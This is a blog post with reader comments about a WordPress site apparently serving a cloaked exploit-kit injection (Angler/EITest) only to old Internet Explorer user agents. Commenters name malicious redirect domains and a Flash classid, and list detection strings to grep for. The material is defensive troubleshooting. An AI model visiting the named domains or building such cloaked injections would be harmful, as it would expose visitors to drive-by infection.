T w e n t y S i d e d
EDIT: Should be fixed now. I’ll have another post following up on this once I’m sure it’s gone. Let me know if you see anything fishy that isn’t an actual fish.
So for a couple of months now I’ve been getting these really strange reports from a small group of peopleLess than five-ish? that my site had been “hacked”. Here is one:
Microsoft Security Essentials blocked content on this website
qwe.systemsviensows.asia
Hosted by: http://www.shamusyoung.comMicrosoft Security Essentials blocked this site because it might contain threats to your PC or your privacy.
And one more:
Got another one. “qwe.arteriosclerosisobliteranas.net”
Also: I dropped my laptop and killed my hard drive a few days ago. I just got a new one installed and just now got the OS and everything updated and running. So it's not a virus or malware on my end that's doing it, this is a totally new hard drive and your website was just about one of the first ones I went to (after gmail and facebook, and I don't thinking I'm getting malware from them.)
It’s very temping to say, “With so few reports, this can’t be a problem on my end.” But I want to be thorough. Furthermore, maybe scammers have gotten smarter and have invented malware that goes dormant in some cases instead of relentlessly attacking. “But it seems to work fine for me!” is perhaps the greatest shield a virus can have. It’s effectively a real-world implementation of the SEP invisibility field.
Some facts:
- I have no idea what the attack looks like. We only have Microsoft Security Essentials to go by here. Again, Microsoft isn’t exactly your go-to company for security, but for the sake of this exercise we’re going to assume MSE is correct.
- All reports involve a similar text, but with a different external URL. Always in the form of qwe.[randomwords].net.
- I use Chrome, and I viewed the site normally logged in as admin, anonymously (using the incognito feature) and using IE 11. Using all three, I’ve searched the resulting page source and have never found any URL’s of the offending form, or anything else suspicious. However, this doesn’t mean the site is safe, because…
- This site runs on WordPress, which runs on PHP. If bad code was installed on my site somehow, then PHP could be showing it in some cases and not others. This might sound far-fetched, but…
- My wife used to keep a blog. She tapered off after a while and forgot about it. It languished for a year or more, neglected. Then she noticed this goofy-ass link right in the middle of get free pills online bullshiturl.com a sentence, just like this one. Either her webhost got hacked, or her super-old, unpatched, neglected WordPress install got hacked. In either case, her theme had been corrupted to insert these bogus links “sometimes”.
However, she was using a super-common built-in theme, which made her an easy target. Even if someone did gain access to my server, they would need to craft an attack specific to my site, because my theme is custom-built and is pretty unorthodox. I’m not saying it’s impossible, but this isn’t the kind of easy generalized target that hackers would go for. Heck, if you can hack my theme and hide the hack from me, then you’re wasting your time with this malware bullshit. Just get some contract work untangling horrific PHP catastrophes. The pay and the job security are better, and nobody will throw you in prison for it.
Again, this suggests we’re not dealing with a real threat. Except…
- I’ve typed bit of this into Google, and come up completely empty. That’s unheard of. If you search for “Why did my peanut butter and jelly sandwich catch fire” you’ll probably find links to a 2010 forum thread where a bunch of people had the same problem. But these searches come up with nothing. This is probably the most interesting piece of evidence so far, and has me leaning towards thinking that the problem is real. After all, if MSE was throwing false-flags, you can bet we’d be up to our eyebrows in analysis, apologists, suggestions to “LOL GET LINUX”, and godawful workarounds.
I am so stumped at this point that I have no choice but to crowdsource this. Have you gotten warnings from MSE? Can you share a screenshot? When did the problem first appear? Do you run a website, and have you gotten these kinds of reports?
Footnotes:
[1] Less than five-ish?
Mass Effect Retrospective
A novel-sized analysis of the Mass Effect series that explains where it all went wrong. Spoiler: It was long before the ending.
Autoblography
The story of me. If you're looking for a picture of what it was like growing up in the seventies, then this is for you.
Game at the Bottom
Why spend millions on visuals that are just a distraction from the REAL game of hotbar-watching?
A Telltale Autopsy
What lessons can we learn from the abrupt demise of this once-impressive games studio?
Joker's Last Laugh
Did you anticipate the big plot twist of Batman: Arkham City? Here's all the ways the game hid that secret from you while also rubbing your nose in it.
Well, avast! doesn’t like the look of that url, so apparently it isn’t just a false alarm.
Hypothetically it could be that a router somewhere is tampering with the http packets, but outside of extremely unlikely cases that would either make more people encounter the problem or cause the people who have it to get it on other sites.
And here I thought it was just me. I use IE11 (I know, I know), and for…the past couple of weeks, I guess? MSSE will randomly flash a warning at me like the ones you’re talking about. Sometimes 3-4 times in a row, sometimes once a day (and the last couple days have been clear entirely – read on). Couldn’t figure out why, but it’s definitely here and only here.
Perhaps coincidentally, and perhaps not, yesterday I came home to find five odd copies of a process with eight random letters for a name attempting to bypass UAC and do…something. And it said it was Google Chrome, which it obviously was not. A bit of googling on “fake google chrome” got me a few pages like this one but very little else. Almost no internet presence I could find.
A bit of hair pulling, Google reading and some MSSE and Malwarebytes scans that turned up precisely nothing later, I finally found a dll with a gibberish eight letter name dated yesterday lurking in Users/Me/AppData/LocalLow/ and deleting it SEEMS to have solved my problem (but of course nothing detected it in the first place, so, uh…). Wish I’d taken screenshots, but hopefully I’m being descriptive enough here.
And coincidentally or no, MSSE isn’t angry at your blog anymore, and warnings have gone from “all day every day” to “we’re all fine here now, thank you. How are you?”
I have no idea if any of this is related. Cause? Symptom? I dunno. But maybe it is related, so here you are. Hope it helps.
It occurs to me to also add:
Both the warnings and the malware were specific to my Windows 7 desktop. My Windows 8.1 laptop right next to it also running IE 11 and 8.1’s version of MSSE, sees nothing of either one, even when I’ve been here on both machines at the same time.
Maybe that data point is also useful.
I’m actually way more trusting of Microsoft than pretty much any other vendor in regards to virus protection – they have a vested interest in viruses being stopped; viruses make Windows look bad, which makes people more likely to buy a Mac. Companies whose livelihood depends on making AV software have a vested interest in viruses existing – it’s how they make their money!
Too bad Microsoft Security Essentials/Defender is historically one of the worst and most ineffectual anti-malware programs of all time (falling well, well below industry average detection rates: http://www.av-test.org/en/antivirus/home-windows/windows-7/august-2014/microsoft-security-essentials-4.5-143171/). Microsoft has even admitted in the past that they purposely avoid blocking certain unwanted software, advertising, etc. because they do not want to endanger business relationships.
These days most anti-virus programs are pretty competitive, but you should always go with a paid one because those companies have a vested interest in providing good ongoing security – if they don’t, then they know people will jump ship to another vendor.
If that’s true, how are Symantec and Norton still in existence? :)
For the same reason that people still smoke and drink too much: You can tell ’em and tell ’em and tell ’em … … and they still won’t listen!
Every company I’ve worked at uses Symantec so I think they must just have a very good business sales team.
MSE has the nice little feature of not degrading into a massive resource hog and screwing up the OS, something which I haven’t been able to get with any of the other free AVs out there. I also don’t recall MSE ever having an incident where it falsely flagged critical system files as viruses, preventing the OS from booting.
It’s only the worst performing anti-virus if you only assess them on their performance against new malware. MSE doesn’t have heuristics (which is the resource hog in AVs) and can be a bit slow to pick that stuff up. It has a 100% detection rate for the common and older malware, but that’s never tested by the sites that hammer MSE (and I remember the pre-MSE days when 100% detection rates on common malware weren’t a given for an AV). It also never has false positives.
So MSE is bad if you need protection against the latest and greatest malware, which mostly describes people doing very sensitive work or businesses that can’t risk that sort of problem. Most people aren’t gonig to run into malware that’s not in the definitions, however. It’s a tradeoff of performance vs security against the very latest malware.
Also, I’ve never seen MSE saying they don’t flag some malware for business reasons. They probably don’t pick up some adware and tracking cookies but many AVs have that same problem.
I’ve been dinged by several script-jacking stuff that gets past AVG. Usual modus operandi is:
1.) Script on a lower end site, wikis and game pages are common, got one off the Resident Evil Wikia.
2.) Gives bullshit “AV” detection, asks to install.
3.) Does it anyway, somehow it gets more and more of what it needs onto my machine.
4.) Uninstalls any Anti-virus capable of dealing with it.
5.) If it detects any anti-virus that could hurt it, proceeds to initiate a shutdown command that brings the computer down in a minute.
I’ve only ever gotten around this two ways (It’s come up three times in my household). Restoring a restore point, or with my current machine, I clocked it all the way up and installed MSE, which pinged it so I could remove it.
As a result, I use adblock(Obviously, manage a whitelist for sites that you want to support) and script-block by default, with AVG and MSE.
Also, down below, HiEv has a very good point. AV companies have a vested interest in Viruses existing in UNPROTECTED machines. If the doctor made you sick why the hell would you go back? As it turns out, he can cure your ailments and set your broken limbs, because he isn’t a fraud. And even though they have an interest in it, propagating viruses is illegal, and there are plenty of people willing to do that for nothing, so why would an AV company do it?
I’d say your example makes a good argument that AVs aren’t the cure-all that they’re sold as. Many AV suites can’t stop plain old ransomware let alone the more serious stuff that ruins a system the second it gets executed. That’s why there’s a whole lot of specialised removal tools. I also agree that script-blockers are a no-brainer for security – many sites use a dozen or more sources of javascript which means a dozen or more vectors of attack. Adblock is also vital as vetting for ads can be terrible and I believe even Google has let malware-infected ads slip through.
And whilst I doubt that antivirus companies would actively be putting viruses out in the wild due to sheer illegality, it is in their interest to make their products look as important as possible. They do this by overstating the prevalence of viruses, the ability of their software to stop them and the inability of simple and free solutions like MSE to stop them instead. And yes, the testing companies aren’t exactly innocent in this despite their independence. Just look at how much they’re talking up the problem of viruses on Android literally right now. People being afraid of malware and not trusting their AV drives traffic.
The above probably sounds like crazy conspiracy talk, but it’s just the natural result of companies wanting to make their products popular. Just like how advertising focuses on making you feel like you need the product.
Ugh. That’s the same kind of crazy conspiracy talk that makes some loons claim that doctors would rather see you sick so they can get paid to fix you. :-P
The fact is, if an anti-virus company ever got caught intentionally doing something like that they’d get shut down so fast it would make your head spin.
And, as others have mentioned, Microsoft’s AV software is terrible, and has a history of being terrible. Microsoft simply doesn’t have the agility to deal with new threats either.
So, in the end, your putting your trust in the wrong people for completely unfounded and irrational reasons that are counter to observable reality.
I guess it can’t be all bad but did you ever try to download Firefox with IE11?
It will bombard you with warnings about unsecure and not recommended and dangerous content, untrusted certificates and whathaveyou … it takes a lot of willpower not to believe that the mozilla website is being run or has been taken over by very very evil people who want to ruin your life…
If that kind of market political thing gets into their process, then I don’t think I want to trust them anymore.
Using Opera, and Comodo Internet Security. No Warnings or rogue processes or dlls.
Recent Win7, recent FF (34.05) + recent MSE: nothing. Never had anything like it.
No idea if this is going to help, but searching for “qwe malware” on google gives some results, which point to something called Angler Exploit Kit (aka Angler EK).
Windows 7 with Chrome and avast and never got a virus warning or anything similar. The only unusual thing that happened was yesterday or the day before: the site didn’t load, completely white screen with DATABASE ERROR in the upper left.
So that wasnt just specific to me.Though it did happen to me occasionally in the past few weeks.But only maybe once in a day or two,so I didnt think its connected to the site.
I got the same error yesterday, so I shortened the address from http://www.shamusyoung.com/twentysided to http://www.shamusyoung.com. That was fine, but the link to the diecast from there produced a database error. My history reports this at 7:32pm gmt, I revisited at 10.02pm gmt and it was fine.
I’ve gotten the database error from this site once or twice as well. I think the most recent was a few weeks ago.
As for malware, I run my site off HostingMatters, and a couple of years back, I happened to be looking at the directory structure of the site (something I never need to do.) I found an entire directory of medical-related ads, placed there somehow. I changed the password and haven’t seen it again.
I also had the “Unable to Connect to Database Error” yesterday. I assumed that Shamus was monkeying around with the site or something. It went away by the time Spoiler Warning was uploaded.
Sometimes irresponsive links on my end as well. Waiting may have helped. New phenom, since the Star Trek posts more or less. Didn’t happen before, and became a not unusual occurrence all of a sudden.
I assumed the problem was on my end, but I guess not.
Oh, so many people saw that? Me too… Thought maybe server is rebooting or something.
I don’t know much (or really anything) about making or running websites, but is there any way to ask Microsoft what they think they’re seeing?
This should answer your question:
There was a pilot flying a small helicopter,with several very important executives on board. As they approached the Seattle airport through thick fog with less than 10 miles visibility when his instruments went out.So,he began circling around looking for a landmark.After some time he started running low on fuel and the passengers were getting anxious.
Finally,a small opening in the fog appeared and the pilot saw a tall building with one guy working alone on the top floor.The pilot approached the building,opened the window and shouted to the guy,”Hey where am I?”.
The office worker replied,”Youre in a helicopter.”.
The pilot closed the window,executed a 275 degree turn executed a perfect blind landing on the runway 5 miles away.Just as the helicopter came to a halt,so did the engine as the fuel ran out.
The passengers were amazed and one asked how he did it.
“Simple”,replied the pilot,”I asked the guy in that building a simple question.The answer he gave me was 100 percent correct but absolutely useless,therefore that must be microsofts support office and from there the airport is just five miles due East”.
Spot on, DL. Spot on.
That’s a variation on another joke. A guy in a balloon asks someone on the ground, “where am I?” and he answers “20 feet up in a balloon.” The guy in the balloon says “you must be an engineer — your answer was absolutely correct, but useless.”
The guy on the ground says “you must be a manager. You don’t know where you are, you need help, and now you think it’s my fault!”
Usually I hear that one in reference to mathematicians, not engineers. Good engineers are practical. :(
And good mathematicians are right
In that case I don’t think I’ve ever met one of these “good engineers”.
Getting the practical part right is grunt work for the lowly draftsmen.
Oh man so spot on. I work in Sharepoint all day and if you want to do anything beyond being a “power user*”, Microsoft’s sites and documentation are next to useless. I only get results fiddling around myself, creating a hack of some kind (hack in its original benign meaning) or getting tips from other independent developer’s blogs (or stack overflow).
Even when their guys do write a blog about how to do something, it often only works for their specific example and it doesn’t give me enough information about how a developer might have gone about figuring that out himself.
A 275 degree turn would be wrong. As would a turn to heading 275, if the airport is east of the building.
Daemian’s clearly not an ambi-turner
I have also gotten these warnings (Win 7, IE but not Firefox). Not from MSE, though, but from my recently installed AVG security suite.
I’ve had similar warnings from other sites that use ads with tracking cookies for product displays (ebay, gumtree etc). I’ve always wondered why your site throws up these warnings even though you don’t use ads anymore. I take it there isn’t any ad code left hiding somewhere?
I’d usually assume these were in the comments section, but since other commenters seems to indicate this only happens in IE on Win7, it might be a clever bit of malware that only injects itself for that specific combination…
Can you go through your spam-filtered comments? Is there some window of opportunity where spam links could creep in before they’re blocked and the comment removed?
What external resources do you use? Javascript libraries, WordPress CSS, WordPress PHP, that sort of thing.
It’s a pity the problem isn’t reproducible but then again that’d be an effective way to hide malware, to make it only do its thing in certain situations and escape notice.
Perhaps it would be useful if the people who experience this warning can send you a copy of the HTML code their browser is seeing? (haven’t seen it myself, I’m not on Windows).
This way maybe you can get a clue as to where the problem lies (for example if a specific plug-in is the problem).
Apparently alt+v+c will open the source in IE (only 8?) http://www.shortcutworld.com/en/win/Internet-Explorer_8.html
Couple of things, though I don’t have a whole lot of time this morning.
If you think your site’s compromised, you can try one of the wordpress scanner plugins or get Google to help out (https://support.google.com/webmasters/topic/4596795?hl=en&ref_topic=4558844).
You can also use resources like urlquery.net that will detail excatly what resources it gets and let you try different user agents (spoiler alert, this page doesn’t seem to access anything suspicious with IE6).
Exploit kits tend to be very selective about their targets, so as to stay active as long as possible. They employ multiple levels of redirection and gather information about the browser before determining both if they’ll serve up an exploit as well as which one. This can explain why you don’t see anything on FF/Linux, while IE on Windows gets popped. Mentioning the actual browser version and plugins installed makes a difference as well (what version of Java/Silverlight/Flash?).
As a quick check, try checking the timestamps on your included files (particularly php and js). See if anything was modified or recently changed. If you’re on a shared host provider, keep in mind it may not have been a vulnerability in your site, but someone else’s that ended up granting access to the box.
If possible, try to find out exactly what page(s) they’re accessing. Check your logs for obviously suspicious access, particularly for domains or IP blocks you don’t recognize or are unique.
Anyone who’s seen this virus warning message should post their exact user agent string. If you’re right, it could be used to get the attack to come up reliably, so that the problem can be dissected.
I can reproduce the virus warning pretty readily: how can I find my exact user agent string so I can post it and help out?
http://www.useragentstring.com/ was the first Google result for User Agent String. It will show up in the box under the label “User Agent String explained :”
Though reading further, it seems that the cause may have been pin-pointed.
Nothing here. Running Windows 8.1 fully patched, latest Chrome, avast! and MS Defender have been all nice and quiet.
Also nothing here – Firefox, MSE, Malwarebytes Pro, SpywareBlaster, Adblock Plus. No alerts or anything else that might seem suspicious.
Nothing here either. Win7, Firefox 32. Microsoft security essentials, Malwayrebytes, Spybot S&D.
Though FF is having problems with flash and refuses to play it on this site (At least the Spoiler Warning videos) but that is my own fault.
Yes, your WordPress blog has picked up something, and yes, it’s doing something to mask itself. If I query this blog with any of my usual user-agent strings, I get a clean blog. If I query this blog masquerading as an old IE, I’m getting additional HTML that embeds a flash movie to what definitely looks like additional bad stuff.
I’ll email details, since I’d like to send you the details so you can help narrow the search for the problem in the PHP but I don’t want your comment section to have any references to the URLs in question.
Edit: email sent. If it doesn’t come through in a bit, check your spam folder… as the email DOES contain hostile code in it is a prime candidate for getting caught! Otherwise, let me know (email’s on this comment) and I’ll work out some other way to send it.
Try sending it as a password-protected zip (with the file extension changed). That’s more likely to make it through filters.
Sorry I overlooked the qwe.[randomwords].net part. That’s Angler performing a redirect to a landing page.
Here’s an example of the chain:
http://www.malware-traffic-analysis.net/2014/09/26/index.html
Check your logs carefully to try and pinpoint a start date and pages you don’t recognize getting served up.
Try grepping through your pages and try to find instances like ‘window.self.location.replace’, ‘document.location.replace’, ‘window.location’, or other similar strings.
Also check to see what software your server is running. What version of Apache? SSL? Database?
…and also check your WordPress themes. Your footer indicates a modified version of Sandbox. There appears to be at least one major vulnerability associated with it that allows arbitrary file uploads.
http://www.vfocus.net/art/20130128/10664.html
Right now if you Google “why did my peanut butter and jelly sandwich catch fire?” the first three results are quotes from St. Elmo’s Fire, a buzzfeed article on how to make a better pbj, and this page. Ooh, fifth link actually involves setting stuff on fire (but just a peanut, not a pbj).
When I checked just now, this page was the number two result for “Why did my peanut butter and jelly sandwich catch fire”! Come on, guys. Let’s go all the way to the top!
I found something suspicious just now. When I visit this very page using Windows 7 IE11 user agent string, it once served me an invisible Flash object. Here’s the diff against the normal page: http://pastebin.com/KXnKU4pf The object itself is served by oqesoxu.uk.to (in this case), which belongs to a dynamic DNS service afraid.org. Very suspicious.
I downloaded the page using wget in all cases, so it was just the user agent string that triggered this.
Followup edit: It seems to only attack any IP once. If I change IP addresses and visit again, I get the attack again immediately. Here’s another diff: http://pastebin.com/iFe9LTkc Notice the malicious URL changed.
I can confirm this. Like Chris said, I only saw the flash injected on the first IE user agent I tried.
Commands and output pasted here: https://gist.github.com/anonymous/95a6bb944c7623390367
This is the most concrete lead so far. Thanks to both of you.
Sadly, I have NO idea where to look from here. Typical Malware sites tell you what the thing looks like on your machine, but not what it looks like on your website. Moreover, the control panel I’m using is a ridiculous pile of crap that doesn’t offer searching in sub-directories, so even if I knew exactly what the thing was called I wouldn’t have a way to find it, short of manually reading through hundreds and hundreds of directories. (WordPress is sprawling.)
Still, it’s looking more like infected=yes.
Is there an option to export or back up the site from the control panel? Use that to get a local file dump you can look through.
Start by looking at the homepage or root for the blog. Search for URLs that don’t reference your site. Also search for php includes you don’t recognize as well as common include files that are part of the page template. The classid ‘d27cdb6e-ae6d-11cf-96b8-444553540000’ appears in both of the snippets from Chris and W, so that may be a fingerprint as well.
Maybe also search for “HTTP_USER_AGENT” and “navigator.userAgent” or anything similar as these could also be obfuscated.
This is obviously the code that’s detecting the useragent, so even if the outputted code changes, this used probably there somewhere.
I don’t know much about wordpress, but you are definitely getting html injection right before the closing body tag. (Oddly it is creating its own body tag inside of your body tag. Stupid malware isn’t html compliant!)
The first place I would look would be whatever module/template handles footers.
Barring that, you could just grep the wordpress directory for something like “clsid:” or maybe “EITest which seem unique enough.
I’ve occasionally gotten notifications about a strange file being downloaded when I visited the site (chrome, Win 8.1). Nothing got flagged by Avast.
I thought that perhaps the proxy I use had been affected, but given this update I suspect it may be related to this site specifically instead.
This blog post MIGHT be relevant. Not sure, I don’t know enough abou this stuff, but it’s recent and it does present similar code injections…
https://blog.malwarebytes.org/exploits-2/2014/10/exposing-the-flash-eitest-malware-campaign/
If it’s only hitting each IP address once, it’s got to be storing them somewhere. If it’s smart enough to not hit incognito users repeatedly, it’s not using anything client-assisted, like session tokens.
Once you find where the list of IPs already hit is, you might be able to grep keywords from there to find the offending file.
Maybe a diff on the database?
I guess that would explain the weirdly intermittent behavior, if it stores a list of IPs it’s already attempted to infect within the last while. Not only would that mean that it doesn’t repeat when people reload the page, port forwarding and such can mean that multiple people can have the same IP as far as the site is concerned.
That matches my experience exactly. Every day when I start up IE and check the blog I get the warning from Microsoft Security Essentials. If I try to access the blog again everything works just fine, no problem.
I didn’t have any of these errors before, but when I just visited the site a moment ago, avast! gave me 5 hostile program warnings in a brief 5-10 minute span of time.
It has never done this before, and it hasn’t done this since. Don’t know if this will help, but here it is.
Aw man, I was here because my sandwich caught on fire and I needed to know what to do. So much for my kitchen…
Well if it’s a non-grease fire you want to smother it, and if it’s a grease fire you want to douse it with water.
…Did I get those two things mixed up? Eh, probably not. I’m sure it’s fine.
Whether or not it’s a grease fire may depend on the brands and types of peanut butter and jelly you use. Your best bet is to reinstall the mixture on new slices of bread and see if the problem persists.
You may also want to check the ingredients list for the peanut butter, and if necessary, compile a new batch from source.
Why even bother with that? Just make a BLT.
Have you tried turning the toaster on and off again?
Maybe you’re being gaslighted. They got you looking for errors that aren’t there to drive you mad.
There are some extensions out there that are doing some nefarious stuff with “keyword” pop-up advertisements in the text of the web page. Those would look to MSE like they were coming from the page themselves, but they’re strictly local stuff.
Does anyone else get a message from Firefox saying that shamusyoung.com is asking to use quick time (with the option to allow or block it)? It only happens about a third of the time, only on the front page, and it doesn’t seem to matter what articles are on the front page.
Running Vista, Firefox 34.0.5, and Norton Antivirus (because my ISP offers it free, so what the hell).
Shamus’ blog hands you a quick time event..?
The End is nigh! *burrows under sofa cushions* Death! War! Famine! Spam!
Or.. *pokes head out between cushions* ..maybe it’s an experiment for a non-irritating QTE creation project? I mean, it does ask nicely and blocking is (allegedly) an option..
I know, right? I’m still figuring out how to press the triangle button on my keyboard! ;)
(Meaning Apple Quicktime, though. The software that once upon a time everything and its mother needed a good install on your system of, but seems to be existing mostly these days as a way to play video and audio in browser that doesn’t have a youtube embed. Which…would probably be the Diecast, now that I’m properly thinking about it. *smacks forehead* Although in my defense, my browser never had an issue with it before (but Firefox is as always in a perpetual state of flux).)
This is fine, but I do have this other weird problem with your site whereby I can’t access it from my main computer, but every other computer I use (my laptop – same network, computer at work – different network) is fine, so I dunno what’s causing that.
I run ScriptSafe, which enumerates all the sources of active content on a page, on Chrome on Windows 10 TP. It has never indicated any kind of unusual XSS or content of any kind from any of those sources. The dev console does not indicate content from those domains, or other weird ones, was loaded.
Of course, as you stated, if it is intermittent and clever then this proves nothing. I will be on the lookout for any tampering on this site and report it if noticed.
Looks like you’ve gotten plenty of feedback on this line already, but I’ll go ahead and add that, several weeks ago, I’d get the MSE warning for your site, but ONLY from Internet Explorer. Chrome never bothered me. I just tried it on IE again now, see if I could get the specific message for you, but I came through alright this time.
My only suggestion would be to download your website minus uploads folder for a start) to a folder on your local machine (or sandboxed VM if you’re worried). Then use a search-in-files tool top search for various strings grin the needs mentioned above. Sublime Text is great for this and regular expressions will help you a lot too.
My first thought was that it might be some rogue JS injecting the links therefore they wouldn’t show up on view-source, but they wouldn’t by there via wget either so I’m guessing it’s buried (and probably obfuscated) in PHP code or something that’s being included as PHP.
It’s not just themes that are vulnerable, idiots keep coming up in plugins too.
Disclaimer: I’m a PHP developer but have little WordPress experience.
On a somewhat related note. Today all of the sudden whenever I try to visit the twenty sided forums I keep getting: 403 Forbidden
“You don’t have permission to access /forums/index.php on this server.”
I’m getting “You don’t have permission to access / on this server.
Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.”
Also, the “check this box if you are not a spammer” box appears to be gone, just in case that wasn’t deliberate.
Huh, the full message for me is:
“You don’t have permission to access /forums/viewforum.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”
Seconded. Never rains for when it pours eh Shamus?
Ditto for me regarding the forums. I haven’t had any of the issues Shamus mentions in his blog though.
Also the “Check this box if you aren’t a spammer” seems to be missing as I post this. It hasn’t been absent before.
I should probably get around to installing an antivirus program, it’s been 2 years now with this PC, or so…
Nooo!Youve killed the edit function!
I hope your site is O.K and a solution is found expediently, Shamus.
Also, fucking love the community coming together to try and figure it out. Only wish I knew more and could help, but alas.
I can say though that using Firefox I have YET to encounter any issues like this with your site.
Shamus, I dunno the first thing about fixing a website, but DO NOT make light of serious issues to prove your point. Incendiary PB&J’s are a real and true threat, one that affects many people and has left many children weeping for their squandered lunch.
Just last week I settled down to a nice meal consisting of a homemade peanut butter and jelly sandwich, a TWIX bar, an orange soda, and a bag of kettle chips. As I opened up my sandwich container, I was expecting to find two pieces of soft, succulent bread smothered with liberal heaps of peanut butter and a conservative amount of jelly. But all I found was a pile of ashes, a faint whiff of smoke and kerosene, and an empty stomach full of disappointment. At least I still had the rest of the stuff, so I was in no danger of starvation, but I had to suffer the rest of my day deprived of my beloved culinary darling. I rushed home as soon as my day was over, and made myself another sandwich to stave off my sense of longing.
Which then caught fire, almost as if to taunt me.
This is a real problem, Shamus Young. Just because you don’t see results in Google search does not mean that it never happens. It happens every day. Every hour. Every meal. Every time I sit down to enjoy my favorite food.
I do not know why my beloved peanut butter and jelly has forsaken me so. But I will find out, and no amount of lackluster Google search results, common sense, or soft-spoken psychiatrists will stop me from rooting out the truth!
(…am I doing this sarcasm thing right?)